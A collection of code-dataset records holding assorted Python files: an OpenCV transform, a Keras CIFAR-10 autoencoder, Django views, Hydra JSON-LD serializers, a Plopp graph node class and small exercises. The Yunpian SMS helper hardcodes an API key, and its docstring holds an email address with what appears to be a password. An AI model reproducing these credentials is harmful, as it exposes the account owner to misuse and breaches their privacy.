root.right.val == root.val:\n self.res += 1\n return True\n return False\n","sub_path":"250.count-univalue-subtrees.python3.py","file_name":"250.count-univalue-subtrees.python3.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"522418444","text":"#Comma-con: takes a list and inserts commas and 'and' and outputs a string\r\n\r\ndef commaCode(values):\r\n s = ''\r\n for i in range(0, len(values) - 1):\r\n s += str(values[i]) + ', '\r\n s += 'and ' + str(values[len(values) - 1])\r\n return s\r\n\r\nvalues = [1, 2, 3, 4]\r\nresult = commaCode(values)\r\nprint(result)\r\n","sub_path":"TutFile6.py","file_name":"TutFile6.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"419256298","text":"\n# Library imports\nimport cv2\nimport numpy as np\n\n# System imports\nfrom system_manager.constants import Constants\n\nclass Transform(Constants):\n\n def __init__(self):\n \n super().__init__()\n\n def inv_map(self, frame):\n \"\"\"\n Transforms given image to top-view image (used for visual debug)\n :frame: front-view image\n :returns: transformation matrix and transformed image\n \"\"\"\n \n image = cv2.warpPerspective(frame, self.M, self.TOP_VIEW_IMAGE_DIMENSION, flags=cv2.INTER_LINEAR)\n \n return image, self.M\n\n \n def convertBack(self, x, y, w, h):\n \"\"\"\n Converts detections output into x-y coordinates\n :x, y: position of bounding box\n :w, h: height and width of bounding box\n \"\"\"\n \n xmin = int(round(x - (w / 2)))\n xmax = int(round(x + (w / 2)))\n ymin = int(round(y - (h / 2)))\n ymax = int(round(y + (h / 2)))\n return xmin, ymin, xmax, ymax\n\n def get_inv_coor_different_boundary(self,detections):\n \"\"\"\n Converts front-view coordinates (of cone) to top-view coordinates\n :detections: front-view coordinates\n :M: transformation matrix\n :returns: top-view coordinates of cones and person\n \"\"\"\n \n blue = []\n orange = []\n \n for detection in detections:\n x, y, w, h = detection[2][0],\\\n detection[2][1],\\\n detection[2][2],\\\n detection[2][3]\n xmin, ymin, xmax, ymax = self.convertBack(\n float(x), float(y), float(w), float(h))\n pt1 = (xmin, ymin)\n pt2 = (xmax, ymax)\n \n a = np.array([[( (xmax+xmin)//2 ), (ymax//1)]], dtype='float32')\n a = np.array([a])\n pointsOut = cv2.perspectiveTransform(a, self.M)\n box = int(pointsOut[0][0][0]), int(pointsOut[0][0][1])\n \n if(detection[0] == 'blue'):\n blue.append(box)\n else:\n orange.append(box)\n \n blue = sorted(blue, key=lambda k:(k[1], k[0])).copy()\n orange = sorted(orange, key=lambda k:(k[1], k[0])).copy()\n\n return blue[::-1], orange[::-1]\n\n\n","sub_path":"src/localization/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"473678666","text":"# coding:utf-8\n__author__ = 'jesse'\n\nimport requests\nimport ujson\nimport logging\nlogger = logging.getLogger(__name__)\n\n\ndef send_message(mobile, text, sign=u'你有课'):\n \"\"\"\n (云片网络)发送短信windy.yang@huanxunedu.com/0o9i8765\n :param\n mobile -- (str/unicode)手机号码\n text -- (str/unicode)短信内容\n sign -- (str/unicode)签名,除非您清楚您的签名可以发送成功,否则请留空,缺省为'在线外教',不需要'【】'符号\n :return\n (dict){\n rlt -- (bool)发送成功或失败\n code -- (int)返回状态码\n msg -- (str)状态说明\n success_count -- (int)发送成功数量\n }\n \"\"\"\n url = u'http://yunpian.com/v1/sms/send.json'\n apikey = 
u'f9d1660d31218d4dadb0bac4558df221'\n headers = {\"Content-type\": \"application/x-www-form-urlencoded\", \"Accept\": \"text/plain\"}\n sign = u'【' + sign + u'】'\n post_data = dict(apikey=apikey,\n mobile=mobile,\n text=sign+text)\n response = requests.post(url, data=post_data, headers=headers)\n if response.status_code == 200:\n rs = ujson.loads(response.content)\n if rs.get('code') == 0:\n return dict(rlt=True,\n code=0,\n msg='success',\n success_count=rs.get('result').get('count'))\n else:\n logger.info(\"API send_message failed, info: %s\", rs.get('msg'))\n return dict(rlt=False,\n code=rs.get('code'),\n msg=rs.get('msg'),\n success_count=rs.get('result').get('count'))\n else:\n logger.info(\"API send_message failed, info: %s\", response.status_code)\n return dict(rlt=False,\n code=response.status_code,\n msg='API %s HTTP Status Error' % url,\n success_count=0)\n","sub_path":"api_master_v2/app_core/thirdpart/message_yunpian.py","file_name":"message_yunpian.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"346474186","text":"\n\ndef bubble_sort_ascending(l):\n n = len(l)\n for i in range(n):\n for j in range(1,n-i):\n if l[j] < l[j-1]:\n l[j], l[j-1] = l[j-1], l[j]\n print(l)\n\n\n\nl = [2154,65,25,3,74,3,2422]\nbubble_sort_ascending(l)\nprint(l)\n\n\n","sub_path":"bubble_sort.py","file_name":"bubble_sort.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"497101637","text":"import numpy as np\n\nfrom keras.datasets import cifar10\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\nfrom keras.optimizers import RMSprop\nfrom keras.utils import np_utils\nimport keras.layers.convolutional as kcnn\n# set this to false once you have tested your code!\n# TEST = True\n\n# function to read in and process the cifar-10 data; set the\n# number of classes you want\ndef load_data(nclass):\n (X_train, y_train), (X_test, y_test) = cifar10.load_data()\n X_train = X_train.astype('float32')\n X_test = X_test.astype('float32')\n X_train /= 255\n X_test /= 255\n # down-sample to three classes\n X_train = X_train[(y_train < nclass).reshape(50000)]\n y_train = y_train[(y_train < nclass).reshape(50000)]\n X_test = X_test[(y_test < nclass).reshape(10000)]\n y_test = y_test[(y_test < nclass).reshape(10000)]\n # create responses\n Y_train = np_utils.to_categorical(y_train, nclass)\n Y_test = np_utils.to_categorical(y_test, nclass)\n if TEST:\n X_train = X_train[:1000]\n Y_train = Y_train[:1000]\n X_test = X_test[:1000]\n Y_test = Y_test[:1000]\n return X_train, Y_train, X_test, Y_test\n\n\n# Note: You'll need to do this manipulation to construct the\n# output of the autoencoder. 
This is because the autoencoder\n# will have a flattened dense layer on the output, and you need\n# to give Keras a flattened version of X_train\nTEST = True\n(X_train, Y_train, X_test, Y_test) = load_data(2)\nprint(X_test.shape)\nprint(Y_test.shape)\n# flatten each 3x32x32 image into a 3072-vector to use as the autoencoder's target output\nX_train_auto_output = X_train.reshape(X_train.shape[0], 3072)\ndef copy_freeze_model(model, nlayers = 1):\n new_model = Sequential()\n for l in model.layers[:nlayers]:\n l.trainable = False\n new_model.add(l)\n return new_model\n\nfor i in range(1):\n model = Sequential()\n k_size = 3\n model.add(kcnn.Convolution2D(32, k_size, k_size, border_mode='same', input_shape=(3, 32, 32)))\n model.add(kcnn.MaxPooling2D(pool_size=(2,2)))\n model.add(Activation('relu'))\n\n model.add(Flatten())\n model.add(Dense(512))\n model.add(Activation('relu'))\n model.add(Dropout(0.5))\n model.add(Dense(3072))\n # model.add(Activation('softmax'))\n\n rms = RMSprop()\n model.compile(loss='mse', optimizer=rms)\n model.fit(X_train, X_train_auto_output, batch_size=32, nb_epoch=25, verbose=1,\n show_accuracy=True, validation_split=0.2)\n print('2: %d\\nClassification rate %02.3f\\n\\n' % (\n 1, model.evaluate(X_test, X_test.reshape(X_test.shape[0], 3072)\n , show_accuracy=True)[1]))\n\n model = copy_freeze_model(model, 3)\n model.add(Flatten())\n model.add(Dense(512))\n model.add(Activation('relu'))\n model.add(Dropout(0.5))\n model.add(Dense(2))\n model.add(Activation('softmax'))\n\n rms = RMSprop()\n model.compile(loss='categorical_crossentropy', optimizer=rms)\n model.fit(X_train, Y_train, batch_size=32, nb_epoch=25, verbose=1,\n show_accuracy=True, validation_split=0.2)\n print('2: %d\\nClassification rate %02.3f\\n\\n' % (\n 1, model.evaluate(X_test, Y_test)))\n\n\n\n\n","sub_path":"ws362_pset07/pset070302.py","file_name":"pset070302.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"111166080","text":"from socket import *\n\nHOST = '127.0.0.1'\nPORT = 21567\nBUFSIZ = 1024\nADDR = (HOST, PORT)\n\ns = socket(AF_INET, SOCK_STREAM)\ns.connect(ADDR)\n\nwhile True:\n data = input('> ')\n s.send(bytes(data, 'utf-8'))\n data = s.recv(BUFSIZ)\n print(str(data, 'utf-8'))\n\n\n\n\n\n\n","sub_path":"net/socket/Client_Server/Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"480591337","text":"import re\n\nimport logging\nfrom unidecode import unidecode\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\nclass Constants:\n __NOT_FOUND__ = 'Not Found'\n __EMPTY__ = ''\n\ndef remove_unicode(s):\n k = []\n if isinstance(s, list):\n for item in s:\n pure_string = None\n if isinstance(item, list):\n pure_string = remove_unicode(item)\n k = k + pure_string\n else:\n pure_string = remove_unicode_from_string(item)\n if not pure_string.strip() is None:\n k.append(pure_string)\n return k\n else:\n return remove_unicode_from_string(s)\n\n'''\nReplaces unicode with a space.\n'''\ndef remove_unicode_from_string(s):\n # convert any unicode punctations.\n punctuation = {0x2018:0x27, 0x2019:0x27, 0x201C:0x22, 0x201D:0x22}\n s2 = s.translate(punctuation)\n return ''.join([i if ord(i) < 128 else ' ' for i in s2])\n\n'''\nReplaces multiple tabs with a space.\nThis processes lists recursively too.\n'''\ndef remove_tabs_spaces(s):\n k = []\n if isinstance(s, list):\n for item in 
s:\n if isinstance(item, list):\n pure_string = remove_tabs_spaces(item)\n k = k + pure_string\n else:\n pure_string = re.sub('\\t+', ' ', item).strip()\n if not pure_string is None:\n k.append(pure_string)\n return k\n else:\n return re.sub('\\t+', ' ', s).strip()\n\n\ndef escape_text(s):\n k = s.replace('\"','\\\\\"')\n k = k.replace(\"'\",\"\\\\'\")\n return k","sub_path":"news/news/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"80873697","text":"import os\r\n\r\ndef fib_sequence(num):\r\n if num == 0:\r\n seq = []\r\n if num == 1:\r\n seq = [1]\r\n if num == 2:\r\n seq = [1, 1]\r\n if num >= 3:\r\n seq = [1, 1]\r\n for i in range(num-2):\r\n seq.append(seq[-1]+seq[-2])\r\n return seq\r\n\r\ndef cls():\r\n os.system('cls' if os.name == 'nt' else 'clear')\r\n\r\ndef startup():\r\n cls()\r\n print('Welcome to the Fibonnaci sequence generator!')\r\n global user_input\r\n while True:\r\n try:\r\n user_input = int(input('How many numbers do you want in the Fibonnaci sequence? '))\r\n break\r\n except ValueError:\r\n print('\\nPlease write a valid number!')\r\n\r\nif __name__ == '__main__':\r\n while True:\r\n startup()\r\n print('\\nYour sequence is:')\r\n print(fib_sequence(user_input))\r\n while True:\r\n repeat = input('Do you want to try again with a different length? [y/n] ').lower()\r\n if repeat in ('y', 'n'):\r\n break\r\n if repeat == 'n':\r\n break\r\n","sub_path":"exercise13.py","file_name":"exercise13.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"209761345","text":"from rest_framework.reverse import reverse\n\ndef getHydraVocab():\n context = {\n \"hydra\": \"http://www.w3.org/ns/hydra/core#\",\n \"ApiDocumentation\": \"hydra:ApiDocumentation\",\n \"property\": {\n \"@id\": \"hydra:property\",\n \"@type\": \"@id\"\n },\n \"readonly\": \"hydra:readonly\",\n \"writeonly\": \"hydra:writeonly\",\n \"supportedClass\": \"hydra:supportedClass\",\n \"supportedProperty\": \"hydra:supportedProperty\",\n \"supportedOperation\": \"hydra:supportedOperation\",\n \"method\": \"hydra:method\",\n \"expects\": {\n \"@id\": \"hydra:expects\",\n \"@type\": \"@id\"\n },\n \"returns\": {\n \"@id\": \"hydra:returns\",\n \"@type\": \"@id\"\n },\n \"statusCodes\": \"hydra:statusCodes\",\n \"code\": \"hydra:statusCode\",\n \"rdf\": \"http://www.w3.org/1999/02/22-rdf-syntax-ns#\",\n \"rdfs\": \"http://www.w3.org/2000/01/rdf-schema#\",\n \"label\": \"rdfs:label\",\n \"Class\": \"hydra:Class\",\n \"description\": \"rdfs:comment\",\n \"domain\": {\n \"@id\": \"rdfs:domain\",\n \"@type\": \"@id\"\n },\n \"range\": {\n \"@id\": \"rdfs:range\",\n \"@type\": \"@id\"\n },\n \"Operation\": \"hydra:Operation\",\n \"subClassOf\": {\n \"@id\": \"rdfs:subClassOf\",\n \"@type\": \"@id\"\n }\n }\n return context\n\nDEFAULT_HYDRA_PREFIX = \"hydra\"\n\nclass HydraReservedWords():\n\n def __init__(self, prefix=DEFAULT_HYDRA_PREFIX, connector=\":\"):\n self.HYDRA_PREFIX = prefix\n self.CONNECTOR = connector\n\n self.ApiDocumentation = self.HYDRA_PREFIX + self.CONNECTOR + \"ApiDocumentation\"\n self.supportedClass = self.HYDRA_PREFIX + self.CONNECTOR + \"supportedClass\"\n\n self.property = self.HYDRA_PREFIX + self.CONNECTOR + \"property\"\n self.required = self.HYDRA_PREFIX + self.CONNECTOR + \"required\"\n self.readable = self.HYDRA_PREFIX + self.CONNECTOR + \"readable\"\n self.writeable = 
self.HYDRA_PREFIX + self.CONNECTOR + \"writeable\"\n\n self.title = self.HYDRA_PREFIX + self.CONNECTOR + \"title\"\n self.method = self.HYDRA_PREFIX + self.CONNECTOR + \"method\"\n self.expects = self.HYDRA_PREFIX + self.CONNECTOR + \"expects\"\n self.returns = self.HYDRA_PREFIX + self.CONNECTOR + \"returns\"\n self.possibleStatus = self.HYDRA_PREFIX + self.CONNECTOR + \"statusCode\"\n\n self.createResourceOperation = self.HYDRA_PREFIX + self.CONNECTOR + \"CreateResourceOperation\"\n self.replaceResourceOperation = self.HYDRA_PREFIX + self.CONNECTOR + \"ReplaceResourceOperation\"\n self.deleteResourceOperation = self.HYDRA_PREFIX + self.CONNECTOR + \"DeleteResourceOperation\"\n self.resourceOperation = self.HYDRA_PREFIX + self.CONNECTOR + \"Operation\"\n\n self.Class = self.HYDRA_PREFIX + self.CONNECTOR + \"Class\"\n self.description = self.HYDRA_PREFIX + self.CONNECTOR + \"description\"\n\n self.suportedProperty = self.HYDRA_PREFIX + self.CONNECTOR + \"suportedProperty\"\n self.suportedOperation = self.HYDRA_PREFIX + self.CONNECTOR + \"suportedOperation\"\n\n\nclass HydraPropertySerializer:\n\n h = HydraReservedWords()\n\n def __init__(self):\n self._data = []\n\n def createProperties(self):\n pass\n\n def getTypeID(self):\n return \"@id\"\n\n def getTypeBoolean(self):\n return \"http://schema.org/Boolean\"\n\n def getTypeFloat(self):\n return \"http://schema.org/Float\"\n\n def getTypeInteger(self):\n return \"http://schema.org/Integer\"\n\n def getTypeString(self):\n return \"http://schema.org/Text\"\n\n def getTypeDate(self):\n return \"http://schema.org/Date\"\n\n def getTypeDateTime(self):\n return \"http://schema.org/DateTime\"\n\n def getTypeTime(self):\n return \"http://schema.org/Time\"\n\n def addProperty(self, name=\"\", type=\"\", required=False, readable=False, writeable=False):\n property = {\n #\"@type\": type,\n self.h.property: name,\n self.h.required: required,\n self.h.readable: readable,\n self.h.writeable: writeable,\n }\n self._data.append(property)\n\n @property\n def data(self):\n self.createProperties()\n return self._data\n\n\nclass HydraMethodSerializer:\n\n h = HydraReservedWords()\n\n def __init__(self):\n self._data = []\n\n def createMethods(self):\n pass\n\n def getCreateName(self):\n return \"POST\"\n\n def getUpdateName(self):\n return \"PUT\"\n\n def getDeleteName(self):\n return \"DELETE\"\n\n def getRetrieveName(self):\n return \"GET\"\n\n def addDefaultCreateOperation(self, id=\"\", expects=\"\", returns=\"\", possible_status=[]):\n method = {\n #\"@id\": id,\n \"@type\": self.h.createResourceOperation,\n self.h.title: \"Create\",\n self.h.method: \"POST\",\n self.h.expects: expects,\n self.h.returns: returns,\n self.h.possibleStatus: possible_status\n }\n self._data.append(method)\n\n def addDefaultUpdateOperation(self, id=\"\", expects=\"\", returns=\"\", possible_status=[]):\n method = {\n #\"@id\": id,\n \"@type\": self.h.replaceResourceOperation,\n self.h.title: \"Update\",\n self.h.method: \"PUT\",\n self.h.expects: expects,\n self.h.returns: returns,\n self.h.possibleStatus: possible_status\n }\n self._data.append(method)\n\n def addDefaultDeleteOperation(self, id=\"\", possible_status=[]):\n method = {\n #\"@id\": id,\n \"@type\": self.h.deleteResourceOperation,\n self.h.title: \"Delete\",\n self.h.method: \"DELETE\",\n self.h.expects: \"\",\n self.h.returns: \"\",\n self.h.possibleStatus: possible_status\n }\n self._data.append(method)\n\n def addCustomOperation(self, id=\"\", type=\"\", title=\"Default\", httpMethod=\"GET\", expects=\"\", 
returns=\"\", possible_status=[]):\n method = {\n #\"@id\": id,\n \"@type\": self.h.resourceOperation,\n self.h.title: title,\n self.h.method: httpMethod,\n self.h.expects: expects,\n self.h.returns: returns,\n self.h.possibleStatus: possible_status\n }\n self._data.append(method)\n\n @property\n def data(self):\n self.createMethods()\n return self._data\n\n# remember of case using authentication\nclass HydraClassSerializer():\n\n h = HydraReservedWords()\n\n def __init__(self, request=None):\n self.request = request\n\n self._data = {}\n\n self.class_name = None\n self.is_collection = False\n self.context = \"\"\n self.description = \"\"\n\n def createProperties(self, property_serializer):\n pass\n\n def createMethods(self, method_serializer):\n pass\n\n # use this to create the entire hydra class. Overwrite this method in child class\n def createMetadata(self):\n self.baseStructure()\n\n property_serializer = HydraPropertySerializer()\n self.createProperties(property_serializer)\n self._data[self.h.suportedProperty] = property_serializer.data\n\n method_serializer = HydraMethodSerializer()\n self.createMethods(method_serializer)\n self._data[self.h.suportedOperation] = method_serializer.data\n\n def baseStructure(self):\n class_name = self.getTitle()\n if self.class_name is None:\n id = \"\"\n else:\n id = reverse('context:detail', args=[self.class_name], request=self.request)\n base = {\n \"@context\": self.getContext(),\n \"@id\": id,\n \"@type\": self.h.Class,\n self.h.title: class_name,\n self.h.description: self.description,\n self.h.suportedProperty: [],\n self.h.suportedOperation: []\n }\n self._data = base\n\n def getClassTitle(self):\n if self.class_name is not None:\n return self.class_name\n else:\n return \"\"\n\n def getTitle(self):\n if self.is_collection:\n return self.getClassTitle()+\"Collection\"\n else:\n return self.getClassTitle()\n\n @property\n def data(self):\n self.createMetadata()\n return self._data\n\n def getContext(self):\n hydraVocab = {\n self.h.HYDRA_PREFIX: reverse('hydra:hydravocab', request=self.request)\n }\n return hydraVocab\n\n\nclass HydraAPISerializer():\n\n _data = {}\n h = HydraReservedWords()\n\n vocab = \"\"\n classes_serializers = ()\n\n def createBase(self):\n id = reverse('documentation:listHydra')\n\n data = {\n \"@context\": \"\",\n \"@id\": id,\n \"@type\": self.h.ApiDocumentation,\n self.h.supportedClass: \"\"\n }\n\n self._data = data\n\n def createMetadata(self):\n self.createBase()\n self._data[self.h.supportedClass] = self.getClassesData()\n self._data[\"@context\"] = self.getContext()\n\n def getContext(self):\n return getHydraVocab()\n\n def getClassesData(self):\n classesData = []\n for aClass in self.classes_serializers:\n aInstance = aClass()\n classesData.append(aInstance.data)\n return classesData\n\n def getClassData(self, class_name):\n aClass = None\n for oneClass in self.classes_serializers:\n temp = oneClass()\n temp = temp.data\n if temp[self.h.title] == class_name:\n aClass = temp\n break\n return aClass\n\n @property\n def data(self):\n self.createMetadata()\n return self._data","sub_path":"hydra/hydra2.py","file_name":"hydra2.py","file_ext":"py","file_size_in_byte":9876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"336677280","text":"# coding=utf-8\n__author__ = 'Kang'\nfrom django.http.response import HttpResponseRedirect\nfrom django.http.response import HttpResponse\nimport os\n\n\ndef show_welcome(request):\n from django.shortcuts import 
render_to_response\n return render_to_response('welcome.html')\n\n\ndef meta(request):\n meta_file = '/Users/Kang/Project/python/carDataShow/meta_txt/'\n os.chdir(meta_file)\n br = open('car_show.txt', 'r')\n lines = br.readlines()\n br.close()\n from django.shortcuts import render_to_response\n return render_to_response('meta.html', {'lines': lines})\n\n\ndef do_data(request):\n meta_file = '/Users/Kang/Project/python/carDataShow/meta_txt/'\n os.chdir(meta_file)\n br = open('car_show.txt', 'r')\n bw = open('/Users/Kang/Temp/car_tans.txt', 'w')\n lines = br.readlines()\n lines = [line.replace(',', '\\t') for line in lines]\n bw.writelines(lines)\n br.close()\n bw.close()\n ok = '数据转换成功!'\n from django.shortcuts import render_to_response\n return render_to_response('welcome.html', {'ok': ok})\n\n\ndef meta_transed(request):\n meta_file = '/Users/Kang/Temp/car_tans.txt'\n from django.shortcuts import render_to_response\n if os.path.exists(meta_file):\n br = open(meta_file, 'r')\n lines = br.readlines()\n br.close()\n os.remove(meta_file)\n return render_to_response('meta_transed.html', {'lines': lines})\n else:\n error = '请先转化!'\n return render_to_response('welcome.html', {'error': error})\n\n\ndef showneed_1_1(request):\n from carDB.models import Test1_One\n test1_1 = Test1_One.objects.all()\n from django.shortcuts import render_to_response\n\n if not test1_1:\n empty = '数据库暂无数据'\n return render_to_response('welcome.html', {'empty': empty})\n else:\n dic = dict()\n for item in test1_1:\n dic[item.car_type] = item.point\n return render_to_response('showneed_1_1.html', {'dic': dic})\n","sub_path":"python/carDataShow/carDataShow/views/welcome.py","file_name":"welcome.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"387992235","text":"class Owner:\n def __init__(self,data):\n self.Name=data[\"Name\"]\n self.FirstName=data[\"FirstName\"]\n self.LastName=data[\"LastName\"]\n self.Email=data[\"Email\"]\n self.HomeAddress=data[\"HomeAddress\"]\n self.DateOfBirth=data[\"DateOfBirth\"]\n self.HomePhone=data[\"HomePhone\"]\n self.SSN=data[\"SSN\"]\n self.PercentageOfOwnership=data[\"PercentageOfOwnership\"]","sub_path":"API/src/model/Owner.py","file_name":"Owner.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"585273234","text":"# SPDX-License-Identifier: BSD-3-Clause\n# Copyright (c) 2023 Scipp contributors (https://github.com/scipp)\n\nfrom __future__ import annotations\n\nimport uuid\nimport warnings\nfrom itertools import chain\nfrom typing import Any, Union\n\nfrom .system import VisibleDeprecationWarning\nfrom .view import View\n\n\n# TODO: Remove this in v23.05.0\ndef input_node(obj: Any) -> Node:\n \"\"\"\n Create a simple node that returns the supplied object when data is requested from\n it. This node has no parents, and typically lives at the top of a graph to provide\n the raw input data.\n\n .. deprecated:: v23.04.0\n Use :class:`Node` instead.\n\n Parameters\n ----------\n obj:\n The object to return when data is requested from the node.\n \"\"\"\n warnings.warn(\n \"plopp.input_node has been deprecated \"\n \"and will be removed in Plopp v23.05.0. 
\"\n \"Use plopp.Node instead.\",\n VisibleDeprecationWarning,\n )\n n = Node(lambda: obj)\n n.name = f'Input <{type(obj).__name__}>'\n return n\n\n\nclass Node:\n \"\"\"\n A node that can have parent and children nodes, to create a graph.\n A node can be constructed from a callable ``func``, or a raw object. In the case\n of a raw object, a node wrapping the object will be created.\n\n Parameters\n ----------\n func:\n The callable that is called when data is requested from the node. This can also\n be a raw object, in which case this becomes a callable that returns the object.\n *parents:\n Positional arguments that represent the positional arguments of the function\n ``func``.\n *kwparents:\n Keyword arguments that represent the keyword arguments of the function ``func``.\n \"\"\"\n\n def __init__(self, func: Any, *parents, **kwparents):\n func_is_callable = callable(func)\n self._input_value = None\n if func_is_callable:\n self.func = func\n else:\n self._input_value = func\n self.func = lambda: func\n self._id = uuid.uuid4().hex\n self.children = []\n self.views = []\n self.parents = [p if isinstance(p, Node) else Node(p) for p in parents]\n self.kwparents = {\n key: p if isinstance(p, Node) else Node(p) for key, p in kwparents.items()\n }\n for parent in chain(self.parents, self.kwparents.values()):\n parent.add_child(self)\n self._data = None\n\n if func_is_callable:\n # Set automatic name from function name and arguments\n args_string = ', '.join(\n chain(\n (f'arg_{i}' for i in range(len(self.parents))),\n self.kwparents.keys(),\n )\n )\n fname = getattr(self.func, \"__name__\", str(self.func))\n self.name = f'{fname}({args_string})'\n else:\n val_str = f'={repr(func)}' if isinstance(func, (int, float, str)) else \"\"\n self.name = f'Input <{type(func).__name__}{val_str}>'\n\n def __call__(self):\n return self.request_data()\n\n @property\n def id(self) -> str:\n \"\"\"\n The unique uuid of the node. This differs from the ``name`` which can be any\n string.\n \"\"\"\n return self._id\n\n @property\n def input_value(self) -> Any:\n \"\"\"\n The input value of the node, if it is an input node.\n \"\"\"\n return self._input_value\n\n @property\n def is_input_node(self) -> bool:\n \"\"\"\n Whether the node is an input node.\n \"\"\"\n return self._input_value is not None\n\n def remove(self):\n \"\"\"\n Remove the node from the graph.\n This attempts to remove clear the list of parents of the node.\n The operation fails is the node has children, as removing it would leave the\n graph in an ill-defined state.\n \"\"\"\n if self.children:\n raise RuntimeError(\n f\"Cannot delete node because it has children {self.children}.\"\n )\n for view in self.views:\n del view.graph_nodes[self.id]\n for parent in chain(self.parents, self.kwparents.values()):\n parent.children.remove(self)\n self.views.clear()\n self.parents.clear()\n self.kwparents.clear()\n\n def request_data(self) -> Any:\n \"\"\"\n Request data from the node. 
This in turn requests data from all of the node's\n parents, and passes those results as arguments to the node's own ``func``.\n The result from calling the function is cached, to limit the number of times\n the graph is traversed.\n \"\"\"\n if self._data is None:\n args = (parent.request_data() for parent in self.parents)\n kwargs = {\n key: parent.request_data() for key, parent in self.kwparents.items()\n }\n self._data = self.func(*args, **kwargs)\n return self._data\n\n def add_child(self, child: Node):\n \"\"\"\n Add a child to the node.\n \"\"\"\n self.children.append(child)\n\n def add_view(self, view: View):\n \"\"\"\n Add a view to the node.\n \"\"\"\n self.views.append(view)\n view.graph_nodes[self.id] = self\n\n def notify_children(self, message: Any):\n \"\"\"\n Notify all of the node's children with ``message``.\n Receiving a notification also means that the local copy of the data is\n out-of-date, and it is thus reset.\n\n Parameters\n ----------\n message:\n The message to pass to the children.\n \"\"\"\n self._data = None\n self.notify_views(message)\n for child in self.children:\n child.notify_children(message)\n\n def notify_views(self, message: Any):\n \"\"\"\n Notify the node's views with ``message``.\n\n Parameters\n ----------\n message:\n The message to pass to the views.\n \"\"\"\n for view in self.views:\n view.notify_view({\"node_id\": self.id, \"message\": message})\n\n def __repr__(self) -> str:\n return f\"Node(name={self.name})\"\n\n def __add__(self, other: Union[Node, Any]) -> Node:\n return Node(lambda x, y: x + y, self, other)\n\n def __radd__(self, other: Union[Node, Any]) -> Node:\n return Node(lambda x, y: x + y, other, self)\n\n def __sub__(self, other: Union[Node, Any]) -> Node:\n return Node(lambda x, y: x - y, self, other)\n\n def __rsub__(self, other: Union[Node, Any]) -> Node:\n return Node(lambda x, y: x - y, other, self)\n\n def __mul__(self, other: Union[Node, Any]) -> Node:\n return Node(lambda x, y: x * y, self, other)\n\n def __rmul__(self, other: Union[Node, Any]) -> Node:\n return Node(lambda x, y: x * y, other, self)\n\n def __truediv__(self, other: Union[Node, Any]) -> Node:\n return Node(lambda x, y: x / y, self, other)\n\n def __rtruediv__(self, other: Union[Node, Any]) -> Node:\n return Node(lambda x, y: x / y, other, self)\n","sub_path":"src/plopp/core/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":7013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"563940949","text":"\"\"\"\n`Veda audio project`_.\n\n.. 
_Veda audio project: https://sanskrit.github.io/groups/dyuganga/projects/audio/veda-audio/\n\"\"\"\n\nimport glob\nimport logging\nimport os\n\n# noinspection PyPep8\nimport pprint\n\nfrom audio_curation import audio_repo, archive_utility\n\n# Remove all handlers associated with the root logger object.\nfor handler in logging.root.handlers[:]:\n logging.root.removeHandler(handler)\nlogging.basicConfig(\n level=logging.DEBUG,\n format=\"%(levelname)s:%(asctime)s:%(module)s:%(lineno)d %(message)s\"\n)\n\n# URL style:\n# https://aurobindo.ru/workings/matherials/rigveda/01/01-177.mp3\n# wget and urllib.request is blocked.\n\n\nclass VedaRepoBase(audio_repo.BaseAudioRepo):\n metadata = {\n \"title\" : \"kRShNa-yajur-veda taittirIya saMhitA IGNCA\",\n \"description\" : \"\"\"\n यजुर्-वेदः। तैत्तिरीय-संहिता।\n Courtsey : IGNCA and Indian taxpayers.\n Tech details- see https://sanskrit.github.io/groups/dyuganga/projects/audio/veda-audio/index.html\n \"\"\"\n }\n\n archive_id=\"yajurveda-taittirIya-ignca\"\n pass\n\n\ndef update_repos(dry_run=False):\n archive_audio_item = archive_utility.ArchiveAudioItem(archive_id=VedaRepoBase.archive_id, metadata=VedaRepoBase.metadata)\n repo = VedaRepoBase(repo_paths=[os.path.join(\"/home/vvasuki/Music/git-curation/veda-audio\", \"taittirIya_ignca\")], archive_audio_item=archive_audio_item, git_remote_origin_basepath=None)\n logging.info(pprint.pformat(repo.reprocess(dry_run=dry_run)))\n\n\nif __name__ == \"__main__\":\n update_repos(dry_run=False)","sub_path":"audio_curation_projects/veda/ignca/taittirIya.py","file_name":"taittirIya.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"463408622","text":"#!/usr/bin/env python\n\nimport copy\n\nfrom CMGTools.RootTools.RootTools import *\nfrom ROOT import gSystem\ngSystem.Load(\"libCondFormatsJetMETObjects\")\nfrom ROOT import 